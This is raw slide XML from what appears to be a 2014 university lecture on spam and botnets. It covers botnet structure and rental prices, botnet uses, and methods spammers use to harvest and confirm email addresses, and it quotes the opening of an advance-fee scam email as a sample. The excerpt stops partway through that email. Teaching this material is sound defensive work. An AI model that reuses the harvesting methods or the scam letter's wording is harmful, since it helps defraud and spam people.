      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A collection of machines infected with a malicious program – the bot – and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>controlled by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>third party (hacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bots </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>connect to a command and control (C&amp;C) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Internet Relay Chat (IRC) server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>some cases a web server or P2P network to avoid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Botnets are rented for cheap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>US-based hosts $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EU-based hosts $60-$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>120</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>international mix type of hosts is $20</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21933221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Botnets</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sale</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="0"/>
            <a:ext cx="5838042" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Donut 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="5562600"/>
            <a:ext cx="2590800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd name="adj" fmla="val 10531"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3657600"/>
            <a:ext cx="1676400" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr marL="342000" indent="-342000" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="496800" lvl="1" indent="-270000" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685800" indent="-228600" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-228600" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1143000" indent="-228600" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Tahoma"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1377950" indent="-228600" defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1603375" indent="-228600" defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="1800" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1830388" indent="-228600" defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="1800" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2057400" indent="-228600" defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:defRPr sz="1800" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Not just spam:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Click fraud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Forum spam posts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34908324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spammers harvest email addresses?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just buy an email list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Crawl the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mailing lists &amp; newsgroups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By guessing (dictionary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, brute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>force, standard)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Confirm valid addresses:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wait for an error message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use ‘Return-Receipt-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To’ header or send HTML message with a ref. to an external image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hack into a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scan files on infected machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hoax, scam and chain letters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C270C27E-8536-9149-9DA9-3AFF6BC96CEE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="1600200"/>
            <a:ext cx="2895600" cy="1062606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41727792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Hoax example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="7924800" cy="4939813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Subject: Dear Respected One, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Dear Respected One, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>GREETINGS,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Permit me to inform you of my desire of going into business relationship with you. I got your contact from the International web site directory. I prayed over it and selected your name among other names due to it's esteeming nature and the recommendations given to me as a reputable and trust worthy person I can do business with and by the recommendations I must not hesitate to confide in you for this simple and sincere business. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>I am </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wumi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Abdul; the only Daughter of late </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Mr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Mrs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> George Abdul. My father was a very wealthy cocoa merchant in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Abidjan,the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
